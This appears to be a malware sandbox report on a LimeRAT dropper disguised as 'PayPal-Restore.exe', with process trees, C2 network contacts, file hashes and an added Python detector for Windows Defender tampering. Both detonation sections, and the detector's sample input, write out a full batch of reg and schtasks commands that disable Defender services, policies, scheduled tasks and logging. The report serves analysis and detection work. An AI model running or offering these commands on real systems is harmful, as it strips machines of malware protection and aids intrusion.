Analysis Overview
SHA256
8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac
Threat Level: Known bad
The file 8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac was found to be: Known bad.
Malicious Activity Summary
LimeRAT
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-05-24 13:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-05-24 13:43
Reported
2022-05-24 13:51
Platform
win7-20220414-en
Max time kernel
4s
Max time network
142s
Command Line
Signatures
LimeRAT
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe | N/A |
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe
"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
PayPal-Restore.exe -dC:\Users\Admin\AppData\Local\Temp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat" "
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\234A.tmp\234B.tmp\234C.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"
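The reg.exe and schtasks.exe children above (and the same set again in behavioral2 below) are the interesting part of this detonation: five Defender services set to start type 4, the Defender policy hive overwritten and then deleted outright, the Defender and ExploitGuard scheduled tasks disabled, and the two Defender ETW autologgers switched off. The following Python is an added example, not part of the sandbox report and not the sandbox's own signature logic. It tags command lines of this shape with the Defender component they hit and an ATT&CK technique, so the burst can be spotted in process-creation telemetry (Sysmon Event ID 1 or Security 4688 with command-line auditing) rather than only in a sandbox. The command-line format, the technique mapping and the "kill chain" threshold are the example's own assumptions; the sample input is constructed from a subset of the behavioral1 process list on this page.

```python
"""Tag Windows Defender tampering in process command lines (added example).

Not part of the sandbox report. Assumes one command line per string, as
captured from process-creation telemetry. Technique IDs follow ATT&CK
Enterprise: T1562.001 Impair Defenses: Disable or Modify Tools,
T1562.006 Indicator Blocking, T1112 Modify Registry, T1053.005 Scheduled Task.
"""
import re

DEFENDER_SERVICES = {"windefend", "wdnissvc", "wdnisdrv", "wdfilter", "wdboot"}
SERVICE_DISABLED = 4  # SCM start type 4 = SERVICE_DISABLED
SERVICES_ROOT = r"hklm\system\currentcontrolset\services"
AUTOLOGGER_ROOT = r"hklm\system\currentcontrolset\control\wmi\autologger"
DEFENDER_AUTOLOGGERS = {"defenderauditlogger", "defenderapilogger"}
POLICY_ROOT = r"hklm\software\policies\microsoft\windows defender"
TASK_FOLDERS = (r"microsoft\windows\windows defender", r"microsoft\windows\exploitguard")


def _tokens(cmdline):
    """Keep double-quoted runs together (paths with spaces), then drop the quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def _opt(tokens, flag):
    """Argument following a case-insensitive switch such as /v or /tn, else None."""
    for i, t in enumerate(tokens[:-1]):
        if t.lower() == flag:
            return tokens[i + 1]
    return None


def _dword(text):
    """Parse a REG_DWORD argument ("4" or "0x4"); None if absent or malformed."""
    try:
        return int(text, 0)
    except (TypeError, ValueError):
        return None


def _under(key, root):
    """True if key is root itself or a subkey of it (both already lower-cased)."""
    return key == root or key.startswith(root + "\\")


def classify(cmdline):
    """Return (technique_id, description) for a Defender-tampering command line, else None."""
    toks = _tokens(cmdline)
    if not toks:
        return None
    exe = toks[0].lower().rsplit("\\", 1)[-1]

    if exe in ("reg", "reg.exe") and len(toks) > 2:
        verb, key = toks[1].lower(), toks[2].lower()
        leaf = key.rsplit("\\", 1)[-1]
        value = (_opt(toks, "/v") or "").lower()
        data = _opt(toks, "/d")
        if (verb == "add" and _under(key, SERVICES_ROOT) and leaf in DEFENDER_SERVICES
                and value == "start" and _dword(data) == SERVICE_DISABLED):
            return ("T1562.001", f"service {leaf} set to SERVICE_DISABLED")
        if (verb == "add" and _under(key, AUTOLOGGER_ROOT) and leaf in DEFENDER_AUTOLOGGERS
                and value == "start" and _dword(data) == 0):
            return ("T1562.006", f"ETW autologger {leaf} turned off")
        if _under(key, POLICY_ROOT):
            if verb == "delete" and key == POLICY_ROOT and not value:
                return ("T1562.001", "whole Defender policy key deleted")
            if verb == "add" and value:
                rel = key[len(POLICY_ROOT):].strip("\\") or "."
                return ("T1562.001", f"Defender policy {rel}\\{value} = {data}")
        if verb == "delete" and value == "securityhealth" and "\\currentversion\\" in key:
            return ("T1112", "SecurityHealth autorun entry removed")
        if verb == "delete" and key.endswith(r"\shellex\contextmenuhandlers\epp"):
            return ("T1112", "Defender context-menu handler (EPP) removed")

    if exe in ("schtasks", "schtasks.exe"):
        task = (_opt(toks, "/tn") or "").lower()
        disabled = any(t.lower() == "/disable" for t in toks)
        if disabled and any(task.startswith(f + "\\") for f in TASK_FOLDERS):
            return ("T1053.005", f"Defender task disabled: {task.rsplit(chr(92), 1)[-1]}")
    return None


def summarize(cmdlines):
    """Classify every line; flag the full burst when services, tasks and ETW are all hit."""
    findings = []
    for c in cmdlines:
        hit = classify(c)
        if hit:
            findings.append((hit[0], hit[1], c))
    by_technique = {}
    for tech, _, _ in findings:
        by_technique[tech] = by_technique.get(tech, 0) + 1
    # Heuristic threshold (assumption): one policy edit can be legitimate admin work,
    # but services + scheduled tasks + ETW autologgers together match this sample's batch.
    kill_chain = {"T1562.001", "T1053.005", "T1562.006"} <= set(by_technique)
    return {"findings": findings, "by_technique": by_technique, "kill_chain": kill_chain}


# Constructed sample: a subset of the behavioral1 process command lines on this page.
SAMPLE_CMDLINES = [
    r'reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f',
    r'reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f',
    r'reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f',
    r'schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable',
    r'schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable',
    r'reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    r'reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    r'reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f',
    r'cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat" "',
    r'PayPal-Restore.exe -dC:\Users\Admin\AppData\Local\Temp',
]

if __name__ == "__main__":
    report = summarize(SAMPLE_CMDLINES)
    for tech, desc, _ in report["findings"]:
        print(tech, desc)
    print("by technique:", report["by_technique"], "kill chain:", report["kill_chain"])
```

Two caveats when turning this into a rule. First, a single policy write under HKLM\Software\Policies\Microsoft\Windows Defender is routine GPO behaviour, so alert on the combination (or on the parent: here every reg.exe is a child of cmd.exe running a .bat out of %TEMP%), not on one line. Second, the sample ends with `reg delete "...\Windows Defender" /f` after it has just written the Disable* policies; whichever order the batch actually runs them in, the deletion also wipes any hardening an administrator had set, so a restored host needs its Defender policy re-applied, not just the services re-enabled.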
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | | tcp |
| US | 93.184.220.29:80 | | tcp |
| CN | 101.226.28.203:80 | | tcp |
| US | 93.184.220.29:80 | | tcp |
| CN | 101.226.28.184:80 | | tcp |
| US | 204.79.197.200:443 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | magicbox3317.ddns.net | udp |
Files
memory/532-54-0x0000000075711000-0x0000000075713000-memory.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
| MD5 | 2b9eee13a0e979e7cce3cbd274386be9 |
| SHA1 | f7ac238066df9d83add932190055185a59d015d2 |
| SHA256 | 2b552c6f59b52970e7c86ebe757293d57af3a1f5260b52744773edb5772e0576 |
| SHA512 | 038caa0f92a17f8e9b3c56cc8afcde172703f28e0f0eb76a81cacc89290055f0343b1d6d1cb777e4673550bd4f5cc8ca9a8e4bc8bd32c9bb10d47bb2767cc0ed |
C:\Users\Admin\AppData\Local\Temp\234A.tmp\234B.tmp\234C.bat
| MD5 | 8760b15c6d12ecc70594fc8db876c68c |
| SHA1 | b1d47a27bf45db9955f07c773a5a334e3b528a97 |
| SHA256 | 9a3d9f84626d1443b0e1fc1afe22cc4045c20714b98838e94542991039cf8463 |
| SHA512 | 0463204ebabf6465ba3be44b31dc235ba240f1899b41336655a3f361932b8225326d8ab7c53130d4ded9412193d5967f805221212b964d6a54492d0f2c331dee |
memory/2020-65-0x0000000000000000-mapping.dmp
memory/2044-68-0x0000000000000000-mapping.dmp
memory/1628-71-0x0000000000000000-mapping.dmp
memory/1156-74-0x0000000000000000-mapping.dmp
memory/1684-78-0x0000000000000000-mapping.dmp
memory/688-79-0x0000000000000000-mapping.dmp
memory/1964-81-0x0000000000000000-mapping.dmp
memory/1772-83-0x0000000000000000-mapping.dmp
memory/1508-86-0x0000000000000000-mapping.dmp
memory/1960-89-0x0000000000000000-mapping.dmp
memory/1616-92-0x0000000000000000-mapping.dmp
memory/2028-91-0x0000000000000000-mapping.dmp
memory/1932-93-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat
| MD5 | 76b34b8a915e15e32871820b24a60556 |
| SHA1 | aabf1487a5dc1880d5c8a6979666b215dc09a837 |
| SHA256 | ff8a34a62c2f4b7b5c058f67cfbbe5df9e74541f909a3b7f8c9fc8155b72d7a1 |
| SHA512 | 2c0d801537d7576ab03b1eda1b0c60eb41525b4bd57b1a77a383b83dd49d20327b16162c7721c0e7b635734f6d96ffa4290dafc6350917ffa7114780d1716ffb |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
| MD5 | 9f150fdb9779485a9b4af5875a48aaf7 |
| SHA1 | 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f |
| SHA256 | 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a |
| SHA512 | b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df |
memory/588-97-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
| MD5 | 9f150fdb9779485a9b4af5875a48aaf7 |
| SHA1 | 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f |
| SHA256 | 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a |
| SHA512 | b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df |
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
| MD5 | 54a1574cacf95b6c5c9c597d8d76de45 |
| SHA1 | 4879d75f50d747a400c03ab9700e816ec0607fe6 |
| SHA256 | 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1 |
| SHA512 | 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f |
memory/904-104-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
| MD5 | 54a1574cacf95b6c5c9c597d8d76de45 |
| SHA1 | 4879d75f50d747a400c03ab9700e816ec0607fe6 |
| SHA256 | 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1 |
| SHA512 | 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f |
memory/904-107-0x0000000000940000-0x000000000095A000-memory.dmp
memory/1000-90-0x0000000000000000-mapping.dmp
memory/432-88-0x0000000000000000-mapping.dmp
memory/1596-87-0x0000000000000000-mapping.dmp
memory/1468-85-0x0000000000000000-mapping.dmp
memory/1812-84-0x0000000000000000-mapping.dmp
memory/1992-82-0x0000000000000000-mapping.dmp
memory/452-80-0x0000000000000000-mapping.dmp
memory/944-77-0x0000000000000000-mapping.dmp
memory/1732-76-0x0000000000000000-mapping.dmp
memory/1736-75-0x0000000000000000-mapping.dmp
memory/1196-73-0x0000000000000000-mapping.dmp
memory/1740-72-0x0000000000000000-mapping.dmp
memory/676-70-0x0000000000000000-mapping.dmp
memory/564-69-0x0000000000000000-mapping.dmp
memory/1008-67-0x0000000000000000-mapping.dmp
memory/2036-66-0x0000000000000000-mapping.dmp
memory/1272-64-0x0000000000000000-mapping.dmp
memory/1792-63-0x0000000000000000-mapping.dmp
memory/1408-61-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
| MD5 | b644afe28f2368af7da90246d13bce4a |
| SHA1 | cd24a837643a47a240c7402592f47ba2e4a978b0 |
| SHA256 | e522c2e61f111716eb1b89ab6daf113c9537464f3dafc89a111e60bf6f1d84e5 |
| SHA512 | 1dd0e33a4bceb3811565fc503e5d12c9bfa0f6687b94ad3232af1cd4bd092ea4759b0d82b3728f1ef203cd902ec1d5ac34fda25b167e001270524280f6a96d90 |
memory/952-58-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
| MD5 | fe4788726b2255e2aa33654f90e7f731 |
| SHA1 | da0181a736a57f57022d241e58fc6f4c25cec755 |
| SHA256 | 9b0889135e08318e0f310913bac7ef86ed1af884ec460c11a66c7190195961a9 |
| SHA512 | 550c50506d5adcfdf22d9c4252e8ad35ccd6eadb02a18185dd2fb7edab57a5e49c99d87ce5c7b9127d94131a71d513481cf0badd36630ed2c3e3ae6743429f33 |
\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
| MD5 | 31120f8f17f419583be650465cde8f50 |
| SHA1 | fe3ea43bb6b214d4e8e32f879811f6a7016d57e5 |
| SHA256 | a7b1756b3578853214a128219c0c005959b39c7105e5eb09b4484caeb877cd61 |
| SHA512 | 6b80e28890aaeb963abe721eb020ab5ea336974a6be563cb9ada5648a4db074895a42f27591429e99a57e402a587699938724a20ef60c232e6bb8475f4bfee80 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-05-24 13:43
Reported
2022-05-24 13:51
Platform
win10v2004-20220414-en
Max time kernel
5s
Max time network
28s
Command Line
Signatures
LimeRAT
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe
"C:\Users\Admin\AppData\Local\Temp\8a86db3b2d144844a959cf43dbe8ff4dc80b9ce0513e5bd7dd9fdf9325a4f2ac.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
PayPal-Restore.exe -dC:\Users\Admin\AppData\Local\Temp
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat" "
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe"
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\76DA.tmp\76DB.tmp\76DC.bat C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\RarSFX0\avdisable.exe
| MD5 | 086890d750b486ec89ca6e7edd4f2d7c |
| SHA1 | 5f393c2eac56b2ebf0b985e9ac065c7c5e515a7b |
| SHA256 | 3d942d2daecb968356ee3886589b37cb8263bcd046fb092021a0c5631a0877d1 |
| SHA512 | 33d99d82ebe57a3e59514a3caef72ff0e91890e8e45a3f1ae715fc7fe7134679f2e8fa178c8c1ef898460beace5408f4caf2955e325e93aa7ccd0b296c4289bf |
memory/3204-133-0x0000000000000000-mapping.dmp
memory/1268-135-0x0000000000000000-mapping.dmp
memory/4276-138-0x0000000000000000-mapping.dmp
memory/4012-143-0x0000000000000000-mapping.dmp
memory/1672-153-0x0000000000000000-mapping.dmp
memory/776-156-0x0000000000000000-mapping.dmp
memory/2352-158-0x0000000000000000-mapping.dmp
memory/736-161-0x0000000000000000-mapping.dmp
memory/232-165-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX0\opener.bat
| MD5 | 76b34b8a915e15e32871820b24a60556 |
| SHA1 | aabf1487a5dc1880d5c8a6979666b215dc09a837 |
| SHA256 | ff8a34a62c2f4b7b5c058f67cfbbe5df9e74541f909a3b7f8c9fc8155b72d7a1 |
| SHA512 | 2c0d801537d7576ab03b1eda1b0c60eb41525b4bd57b1a77a383b83dd49d20327b16162c7721c0e7b635734f6d96ffa4290dafc6350917ffa7114780d1716ffb |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PayPal-Restore.exe
| MD5 | 9f150fdb9779485a9b4af5875a48aaf7 |
| SHA1 | 47e2d38e7c69a8e7f0e2993f3f8cb131483aa97f |
| SHA256 | 981c27f97402dab365ed009cff2ab23946424a8f0b1d31f080c1e8675434434a |
| SHA512 | b4e94b127f75afb8fcc3d9555ecc608141b27e81755d3b9ffe0ef8632a7594806564f3e5a6dbbc2869b77c11d4570afc7b167440bcdf6f49934f2b4dbb4357df |
memory/392-167-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\RarSFX1\PayPal-Restore.exe
| MD5 | 54a1574cacf95b6c5c9c597d8d76de45 |
| SHA1 | 4879d75f50d747a400c03ab9700e816ec0607fe6 |
| SHA256 | 67f6ae56cdde6082b3cf05ba9a1a730dcf2e63eeb291507f1420b818d6e05eb1 |
| SHA512 | 869b1ae4b939c4a2ea6528c9639de811bbd6048c686c4a2a0ae63443510b7575fa816890a13e83504afb5ce0322de228c1c6db3ab9c437a35a6fb8eabd5aeb2f |
memory/2952-170-0x0000000000000000-mapping.dmp
memory/324-164-0x0000000000000000-mapping.dmp
memory/2952-173-0x0000000000010000-0x000000000002A000-memory.dmp
memory/2952-174-0x0000000004960000-0x00000000049FC000-memory.dmp
memory/2684-163-0x0000000000000000-mapping.dmp
memory/2844-162-0x0000000000000000-mapping.dmp
memory/2584-160-0x0000000000000000-mapping.dmp
memory/4164-159-0x0000000000000000-mapping.dmp
memory/4392-157-0x0000000000000000-mapping.dmp
memory/4712-155-0x0000000000000000-mapping.dmp
memory/4968-154-0x0000000000000000-mapping.dmp
memory/3772-152-0x0000000000000000-mapping.dmp
memory/5104-151-0x0000000000000000-mapping.dmp
memory/4516-150-0x0000000000000000-mapping.dmp
memory/2036-149-0x0000000000000000-mapping.dmp
memory/1732-148-0x0000000000000000-mapping.dmp
memory/1348-147-0x0000000000000000-mapping.dmp
memory/552-146-0x0000000000000000-mapping.dmp
memory/2164-145-0x0000000000000000-mapping.dmp
memory/2172-144-0x0000000000000000-mapping.dmp
memory/4140-142-0x0000000000000000-mapping.dmp
memory/3592-141-0x0000000000000000-mapping.dmp
memory/4224-140-0x0000000000000000-mapping.dmp
memory/4260-139-0x0000000000000000-mapping.dmp
memory/4884-137-0x0000000000000000-mapping.dmp
memory/3404-136-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\76DA.tmp\76DB.tmp\76DC.bat
| MD5 | 8760b15c6d12ecc70594fc8db876c68c |
